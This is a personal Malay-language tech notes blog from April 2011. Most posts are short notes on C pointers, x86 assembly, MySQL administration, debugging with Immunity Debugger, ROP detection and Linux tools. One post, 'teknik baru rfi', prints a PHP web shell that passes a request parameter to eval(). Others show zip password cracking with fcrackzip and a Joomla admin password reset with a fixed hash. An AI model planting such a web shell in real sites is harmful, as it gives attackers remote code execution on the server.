29 April 2011

char array vs char pointer

char j2[100] = "adam:Aku darah anak malaysia";
char *j3;

j3 = j2 ;
printf("&j2=%p j2=%p\n",&j2, j2);
printf("&j3=%p  j3=%x\n", &j3, j3);


>>:

&j2=0x7fff1b810fc0 j2=0x7fff1b810fc0
&j3=0x7fff1b810fb8  j3=1b810fc0



#di compile dan run atas 64bit OS.
&j2 sama dgn j2 dan j3.
&j3 adalah lokasi dimana alamat j2 disimpan.

28 April 2011

string.h (c)

1) strcmp
bil = strcmp(char *strA, char *strB);
if (bil == 0){
>> strA = strB
}



2) strstr
char *s1 = "amanamanam";
char *s2 = "ana";
char *s3;

s3 = strstr(s1, s2);
printf("%p - %p = %f\n",s3, s1, (double)(s3 - s1));
>>>>0x40085e - 0x40085c = 2.000000

26 April 2011

bit, byte, word

1nible = 4 bit
1byte = 8 bit
1word = 2 byte = 16 bit
1dword = 4byte = 32 bit


ps:/ setiap alamat dalam memory boleh isi 8 bit

retn

retn >> pop eip

retn 10 >> pop eip,
           >> add esp,10h

Contoh:
1-Mula seperti dibawah.

Sebelum RETN 14 (alamat 76E0BFA9), ESP = 001BFA18. 
RET 14 >>
- POP EIP
- ADD ESP 14




2- Hasilnya, perubahan berlaku pada EIP dan ESP.
- POP EIP akan menyebabkan ESP bertukar kepada 001BFA1C. 
- SUB ESP, 14 >>  ESP = 001BFA1C + 14 = 001BFA30
seperti dibawah:

25 April 2011

jump if overflow

assembly:
jo > jump if overflow

Tapi ni bukan stack overflow. Dia rujuk kepada flag overflow(O) kat CPU.
Flag ni aktif kalau hasil kira2 terakhir, nilainya terlalu besar utk simpan dalam register.


[false alarm.]

mysql create user

GRANT ALL PRIVILEGES ON `dbName`.* TO 'mysqluser'@'localhost' WITH GRANT OPTION ;



Detail:
CREATE USER 'new-username'@'localhost' IDENTIFIED BY 'new-password';
GRANT ALL ON *.* TO 'new-username'@'localhost' WITH GRANT OPTION;



There is a list of privileges that you can grant to a user:
PrivilegeMeaning
ALL [PRIVILEGES]Sets all simple privileges except GRANT OPTION
ALTEREnables use of ALTER TABLE
CREATEEnables use of CREATE TABLE
CREATE TEMPORARY TABLESEnables use of CREATE TEMPORARY TABLE
DELETEEnables use of DELETE
DROPEnables use of DROP TABLE
EXECUTENot implemented
FILEEnables use of SELECT … INTO OUTFILE and LOAD DATA INFILE
INDEXEnables use of CREATE INDEX and DROP INDEX
INSERTEnables use of INSERT
LOCK TABLESEnables use of LOCK TABLES on tables for which you have the SELECT privilege
PROCESSEnables the user to see all processes with SHOW PROCESSLIST
REFERENCESNot implemented
RELOADEnables use of FLUSH
REPLICATION CLIENTEnables the user to ask where slave or master servers are
REPLICATION SLAVENeeded for replication slaves (to read binary log events from the master)
SELECTEnables use of SELECT
SHOW DATABASESSHOW DATABASES shows all databases
SHUTDOWNEnables use of MySQLadmin shutdown
SUPEREnables use of CHANGE MASTER, KILL, PURGE MASTER LOGS, and SET GLOBAL statements, the MySQLadmin debug command; allows you to connect (once) even if max_connections is reached
UPDATEEnables use of UPDATE
USAGESynonym for “no privileges”
GRANT OPTIONEnables privileges to be granted


ref: http://stuntsnippets.com/mysql-create-new-user/

22 April 2011

pyHook

Cara nak guna pyHook dalam Immunity Debugger

1- Simpan kod di bawah dalam dir ~pathToImmunityDebugger\PyCommands\mhcubaHook.py
mhcubaHook.py

  • line 17-18: nama hook mesti berlainan.


2- Buka Immunity Debugger dan File->Open sebarang fail exe.

3- Taip !mhcubaHook  dan [enter] dalam command box(pada bahagian bawah I.D. Akan dapati warna latar pada alamat 00401012 bertukar warna pink. Ini kerana arahan 'myhook.add(alamat)' .

4- Tekan butang F9(atau Debug->Run)

5- Klik menu Window-Log utk lihat hasilnya

21 April 2011

recover delete file

sudo dd if=/dev/mmcblk0p1 of=myCard.img bs=512

photorec myCard.img

ref: http://goinggnu.wordpress.com/2008/02/14/recover-deleted-files-from-memory-card/

20 April 2011

select into outfile


SELECT * INTO OUTFILE "/backup/books/allbooks.txt"
FIELDS TERMINATED BY '\t' LINES TERMINATED BY '\n'
FROM books;

ref:
http://www.mysqlfaqs.net/mysql-faqs/Data-Back-Up/Export-Data/How-to-use-SELECT-INTO-OUTFILE-statement-to-export-data

mysqldump tanpa lock tables

mysqldump --lock-tables=false  -h komar.asia -u nama -ppassword database  > namaTable.sql

save mms stream

http://forum.videohelp.com/threads/257045-How-to-record-streaming-WMV-ASF-MMS-links-using-VLC-Media-Player

18 April 2011

reset joomla 1.6 admin password

ganti field password kepada:
 d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199


seterusnya, login guna password secret.

15 April 2011

masalah codec libraray

tiba-tiba media player(vlc) tak support byk format. avidemux pun sama, format yg di suppoprt menjadi kurang.

kat bawah ni cara nak selesaikan masalah.

---------------------------------------
I just solved my vlc video problems. It appears that the culprit was the getdeb repository that I had recently added. I commented out that repo and downgraded several packages - libavcodec-extra-52, libavdevice-extra-52 etc. The most important one seems to be libva1.

In case anyone needs detailed version information for some packages, I will be happy to post.


----------------------------
Open synaptic, search ffmpeg, and remove all installed ffmpeg libraires, starting with libavcodec* down to libswscale*

You'll lose some players and a plugin or 2, no matter, they can be reinstalled. (in synaptic, file -> history will show you

Then install some players and libxine1-ffmpeg and see.


ref:http://ubuntuforums.org/archive/index.php/t-1544929.html

pfctl bsd

susah betul nak ingat BSD ni.

pfctl -n -f /etc/pf.conf

cmp, jl, jg

cmp eax,5
bermaksud: eax - 5


mv eax, 4
cmp eax, 5
; > je -> tak
; > jl -> ya
; > jg -> tak

mv eax, 4
cmp eax, 4
; > je -> ya
; > jl -> tak
; > jg -> tak

mv eax, 4
cmp eax, 3
; > je -> tak
; > jl -> tak
; > jg -> ya


Flag Register
Bit 6: Zero -->> kalau cmp 5,5 -->> Z flag = 1
Bit 7: Sign -->> negatif sign, kalau cmp 1,2 -->>flag = 1

14 April 2011

print poster atas kertas a4

ubuntu$ pdfposter -s 1  asal.pdf baru.pdf

asal.pdf adalah fail yg bersaiz besar, cuma satu muka surat.
baru.pdf fail saiz a4, tapi banyak muka surat.

print baru.pdf dan sambungkan kertas a4 menjadi poster yg besar

mencari ROP(return-oriented programming)

1- berhenti bila jumpa 'retn'
2- kalau 20 nilai teratas pada stack menunjuk kepada executable area dalam memori, besar kemungkinan ada ROP attempt.

teknik baru rfi

 
<?php
if(isset($_REQUEST["code_str"])){
eval(stripslashes($_REQUEST["code_str"]));
} else {
exit(999 * 4 . " The Roof Is On Fire");
}
?>

13 April 2011

pin what???

rasanya pin(http://www.pintool.org/) ni boleh ganti hooking.

Contoh penggunaan adalah utk log kan setiap arahan opcode yg process jalankan.

Satu lagi alternatif ialah DynamoRIO(http://groups.csail.mit.edu/cag/dynamorio/)


ref: http://blog.zynamics.com/2010/07/28/dumping-shellcode-with-pin/

tebuk fail zip guna fcrackzip

$ zip --encrypt -r secret secret/
(creating secret.zip)


$ fcrackzip -u -c a -p aaaaa secret.zip
PASSWORD FOUND!!!!: pw == linux







ref http://linuxers.org/article/how-crack-zip-file-passwords-linux-using-fcrackzip

12 April 2011

setiap alamat ada 8 bit

setiap alamat dalam memori boleh isi 8 bit.

eg:
alamat            nilai(dlm hexadecimal)
---------------   -------------
0x00102000: 41 44
0x00102001: 41 20
0x00102002: 42 41  43 41
0x00102004: 00

  • [1- for dummies: kenapa 0x00102003 tiada kat atas?]
  • [2- kalau char * str = 0x102000, printf("%s", str) dapat apa? ]



4 bit  boleh simpan 16 nilai berbeza
dlm hexadecimal    0x0 - 0xF

8 bit(1 byte) >> 0x00 - 0xFF

11 April 2011

cmp (opcode)

cmp eax, ebx
>>
eax - ebx = y
kalau y == 0, ZF = 1 (True)
kalau y !=0,  ZF = 0 (False)

Assembly Leave Retn

LEAVE =>  POP EBP

RETN =>  POP EIP

VirtualProtect

Dalam Immunity Debugger-> Memory Map

Asal
Memory map, item 13
 Address=00401000
 Size=0000F000 (61440.)
 Owner=setup279 00400000
 Section=.text
 Contains=code
 Type=Imag 01001002
 Access=R E
 Initial access=RWE



Call Virtual Protect API
0040F253  |. 50             PUSH EAX                                          ; /pOldProtect
0040F254  |. 6A 40          PUSH 40                                           ; |NewProtect = PAGE_EXECUTE_READWRITE
0040F256  |. 52             PUSH EDX                                          ; |Size
0040F257  |. 68 00104000    PUSH setup279.00401000                            ; |Address = setup279.00401000
0040F25C  |. E8 1F000000    CALL <JMP.&kernel32.VirtualProtect>               ; \VirtualProtect


 Result

Memory map, item 13
 Address=00401000
 Size=0000F000 (61440.)
 Owner=setup279 00400000
 Section=.text
 Contains=code
 Type=Imag 01001002
 Access=RWE CopyOnWr
 Initial access=RWE


Perubahan pada field Access, dari [R E]  kepada [RWE CopyOnWr]

07 April 2011

Bismillah

Dimulakan dengan nama Allah yang Maha Pemurah dan Maha Mengasihani.
Serta selawat dan salam untuk nabi Muhammad(SAW)